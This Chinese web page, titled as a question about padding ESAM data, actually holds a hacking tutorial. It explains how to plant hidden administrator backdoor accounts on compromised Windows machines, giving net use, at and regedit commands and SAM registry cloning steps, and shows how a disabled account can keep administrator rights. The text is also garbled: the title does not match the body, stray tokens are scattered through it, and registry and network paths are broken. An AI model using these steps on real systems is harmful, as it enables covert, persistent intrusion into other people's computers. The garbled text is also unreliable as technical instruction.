當前位置:首頁 » 網路資訊 » ESAM數據怎樣在前面加0
擴展閱讀
在哪個app可以看周傑倫 2024-11-24 14:17:15

ESAM數據怎樣在前面加0

發布時間: 2024-10-01 03:35:55

1. 一個登陸界面,有關如何使用管理員身份或者普通用戶身份登陸的問題

Win XP中建立隱藏用戶的多種方法

一、如何在圖形界面建立隱藏的超級用戶

圖形界面下適用本地或開3389終端服務的肉雞上。上面我提到的那位作者說的方法很好,但是較為復雜,還要用到psu.exe(讓程序以系統用戶身份運行的程序),如果在肉雞上的話還要上傳psu.exe。我說的這個方法將不用到psu.exe這個程序。因為windows2000有兩個注冊表編輯器:regedit.exe和regedt32.exe。XP中regedit.exe和regedt32.exe實為一個程序,修改鍵值的許可權時在右鍵中點「許可權」來修改。對regedit.exe我想大家都很熟悉,但卻不能對注冊表的項鍵設置許可權,而regedt32.exe最大的優點就是能夠對注冊表的項鍵設置許可權。nt/2000/xp的帳戶信息都在注冊表的HKEY_LOCAL_MACHINESAMSAM鍵下,但是除了系統用戶SYSTEM外,其它用戶都無權查看到裡面的信息,因此我首先用regedt32.exe對SAM鍵為我設置為「完全控制」許可權。這樣就可以對SAM鍵內的信息進行讀寫了了。具體步聚如下:

1、假設我們是以超級用戶administrator登錄到開有終端服務的肉雞上的,首先在命令行下或帳戶管理器中建立一個帳戶:hacker$,這里我在命令行下建立這個帳戶 字串7

net user hacker$ 1234 /add

2、在開始/運行中輸入:regedt32.exe並回車來運行regedt32.exe。

3、點「許可權」以後會彈出窗口

點添加將我登錄時的帳戶添加到安全欄內,這里我是以administrator的身份登錄的,所以我就將administrator加入,並設置許可權為「完全控制"。這里需要說明一下:最好是添加你登錄的帳戶或帳戶所在的組,切莫修改原有的帳戶或組,否則將會帶來一系列不必要的問題。等隱藏超級用戶建好以,再來這里將你添加的帳戶刪除即可。

4、再點「開始」→「運行」並輸入"regedit.exe" 回車,啟動注冊表編輯器regedit.exe。

打開鍵:HKEY_LOCAL_$"

5、將項hacker$、00000409、000001F4導出為hacker.reg、409.reg、1f4.reg,用記事本分別打這幾個導出的文件進行編輯,將超級用戶對應的項000001F4下的鍵"F"的值復制,並覆蓋hacker$對應的項00000409下的鍵"F"的值,然後再將00000409.reg與hacker.reg合並。

6、在命令行下執行net user hacker$ /del將用戶hacker$刪除:net user hacker$ /del

7、在regedit.exe的窗口內按F5刷新,然後打文件-導入注冊表文件將修改好的hacker.reg導入注冊表即可
字串6

8、到此,隱藏的超級用戶hacker$已經建好了,然後關閉regedit.exe。在regedt32.exe窗口內把HKEY_LOCAL_MACHINESAMSAM鍵許可權改回原來的樣子(只要刪除添加的帳戶administrator即可)。

9、注意:隱藏的超級用戶建好後,在帳戶管理器看不到hacker$這個用戶,在命令行用「net user」命令也看不到,但是超級用戶建立以後,就不能再改密碼了,如果用net user命令來改hacker$的密碼的話,那麼在帳戶管理器中將又會看這個隱藏的超級用戶了,而且不能刪除。

二、如何在命令行下遠程建立隱藏的超級用戶

在這里將用at的命令,因為用at產生的計劃任務是以系統身份運行的,所以也用不到psu.exe程序。為了能夠使用at命令,肉雞必須開有schele的服務,如果沒有開啟,可用流光里帶的工具netsvc.exe或sc.exe來遠程啟動,當然其方法也可以,只要能啟動schele服務就行。

對於命令行方式,你可以採用各種連接方式,如用SQLexec連接MSSQL的1433埠,也可以用telnet服務,只要以你能得到一個cmdshell,並且有運行at命令的許可權就可以。
字串9

1、首先找到一台肉雞,至於如何來找那不是我這里所說的話題。這里先假設找到一台超級用戶為administrator,密碼為12345678的肉雞,現在我們開始在命令行下遠程為它建立隱藏的超級用戶。(例子中的主機是我的區域網內的一台主機,我將它的ip地址改為13.50.97.238,,請勿在互聯網上對號入座,以免騷擾正常的ip地址。)

2、先與肉雞建立連接,命令為: net use 13.50.97.238ipc$ "12345678" /user:"administrator

3、用at命令在肉雞上建立一個用戶(如果at服務沒有啟動,可用小榕的netsvc.exe或sc.exe來遠程啟動):at 13.50.97.238 12:51

c:winntsystem32net.exe user hacker$ 1234 /add

建立這個加有$符的用戶名,是因為加有$符後,命令行下用net user將不顯示這個用戶,但在帳戶管理器卻能看到這個用戶。

4、同樣用at命令導出HKEY_LOCAL_下鍵值:at 13.50.97.238 12:55

c:winntregedit.exe /e hacker.reg HKEY_LOCAL_

/e 是regedit.exe的參數,在_LOCAL_這個鍵的一定要以結尾。必要的情況下可以用引號將"c:winntregedit.exe /e hacker.reg HKEY_LOCAL_"引起來。
字串2

5、將肉雞上的hacker.reg下載到本機上用記事本打開進行編輯命令為: 13.50.97.238admin$system32hacker.reg

c:hacker.reg

修改的方法圖形界中已經介紹過了,這里就不作介紹了。

6、再將編輯好的hacker.reg拷回肉雞上 c:hacker.reg 13.50.97.238admin$system32hacker1.reg

7、查看肉雞時間:net time 13.50.97.238 然後用at命令將用戶hacker$刪除:

at 13.50.97.238 13:40 net user hacker$ /del

8、驗證hacker$是否刪除:用

net use 13.50.97.238 /del 斷開與肉雞的連接。

net use 13.50.97.238ipc$ "1234" /user:"hacker$" 用帳戶hacker$與肉雞連接,不能連接說明已刪除。

9、再與肉雞建立連接:net use 13.50.97.238ipc$ "12345678" /user:"administrator"

再取得肉雞時間,用at命令將拷回肉雞的hacker1.reg導入肉雞注冊表:

at 13.50.97.238 13:41 c:winntregedit.exe /s hacker1.reg

regedit.exe的參數/s是指安靜模式。

10、再驗證hacker$是否已建立,方法同上面驗證hacker$是否被刪除一樣。
字串1

11、再驗證用戶hacker$是否有讀、寫、刪的許可權,如果不放心,你還可驗證是否能建立其它帳戶。

12、通過11可以斷定用戶hacker$具有超級用戶許可權,因為最初我用at命令建立它的時候是一個普通用戶,而現在卻具有遠程讀、寫、刪的許可權。

三、如果肉雞沒有開3389終端服務,而我又不想用命令行,怎麼辦?

這種情況下,你也可以用界面方式來遠程為肉雞建立隱藏的超級用戶。因為regedit.exe、regedt32.exe都有連接網路注冊表的功能,你可以用regedt32.exe來為遠程主機的注冊表項設置許可權,用regedit.exe來編輯遠程注冊表。帳戶管理器也有一項連另一台計算機的功能,你可以用帳戶管理器為遠程主機建立和刪除帳戶。具體步聚與上面介紹的相似,我就不多說了,只它的速度實在是令人難以忍受。

但是這里有兩個前提:1、先用net use 肉雞ipipc$ "密碼" /user:"超級用戶名"來與遠程主機建立連接以後,才能用regedit.exe regedt32.exe及帳戶管理器與遠程主機連接。

2、遠程主機必須開啟遠程注冊表服務(沒有開啟的話,你也可以遠程開啟,因為你有超級用戶的密碼了)。 字串1

四、利用被禁用的帳戶建立隱藏的超級用戶:我們可以用肉雞上被禁止的用戶來建立隱藏的超組用戶.方法如下:

1.想辦法查看有哪些用戶被細心的管理員禁止,一般情況下,有些管理員出於安全考慮,通常會將guest禁用,當然了會禁用其它用戶。在圖形界面下,非常容易,只要在帳戶管理器中就可以看到被禁用的帳戶上有一個紅叉;而在命令行下,我還沒有想到好的辦法,只能在命令行下用命令:"net user 用戶名"一個一個來查看用戶是否被禁用。

2.在這里,我們假設用戶hacker被管理員禁用。首先,我先用小榕的超組用戶克隆程序CA.exe,將被禁用的用戶hacker 克隆成超級用戶(克隆之後,被禁用的用戶hacker就會自動被激活了): CA.EXE 肉雞ip Administrator 超級用戶密碼 hacher hacher密碼。

3.如果你現在一個cmdshell,如利用telnet服務或SQLEXEC連接肉雞的msSQL的默認埠1433得到的shell都可以,這時你只要輸入命令:

net user hacker /active:no 這樣用戶hacker就被禁用了(至少表面上是這樣的),當然你也可以將用戶hacher換成其它的被禁用的用戶。

4.這時如果你在圖形界面下看帳戶管理器中的用戶時,會發現用戶hacker被禁用了,但事實上是這樣的嗎?你用這個被禁用的用戶連接一下肉雞看看是否能連上?用命令:net user 肉雞ipipc$ "hacker密碼" /user:"hacker" 連一連看看。我可以告訴大家,經過我多次試驗,次次都能成功,而且還是超級用戶許可權。
字串8

5.如果沒有cmdshell怎麼辦?你可以我上面介紹的at命令來禁用用戶hacker;命令格式:at 肉雞ip 時間 net user hacker /active:no

6.原理:具體的高深的原理我也說不上來,我只能從最簡單的說。你先在圖形界面下在帳戶管理器中禁用一下超級用戶administrator看看,肯定會彈出一對話框,並禁止你繼續禁用超級用戶administrator,同樣,因為在克隆時,hacker在注冊表的"F"鍵被超級用戶administrator在注冊表的"F"鍵所替代,因而hacker就具有了超級用戶的許可權了,但是由於hacker在注冊表內"C"健還是原來的"C"鍵,所以hacker還是會被禁用,但是它的超級用戶許可權卻不會被禁用,因此被禁用的用戶hacker還是可以連接肉雞,而且還具有超級用戶的許可權。具體我也說不明白,大家權且這么理解吧。

五、注意的幾點事項:

1、隱藏的超級用戶建立以後,在帳戶管理器中和命令行下均看不到這個用戶,但這個用戶卻存在。

2、隱藏的超級用戶建立以後,就不能再修改密碼了,因為一旦修改密碼,這個隱藏的超級用戶就會暴露在帳戶管理器中,而且不能刪除。

3、如在本機上試驗時,最好用系統自帶的備份工具先備份好本機的「系統狀態」主要是注冊表的備份,因為本人做試驗時,曾出現過帳戶管理器中看不到任何用戶,組中也看不到任何組的現象,但它們卻存在。幸好我有備份,呵呵。SAM鍵是畢竟系統最敏感的部位。
字串2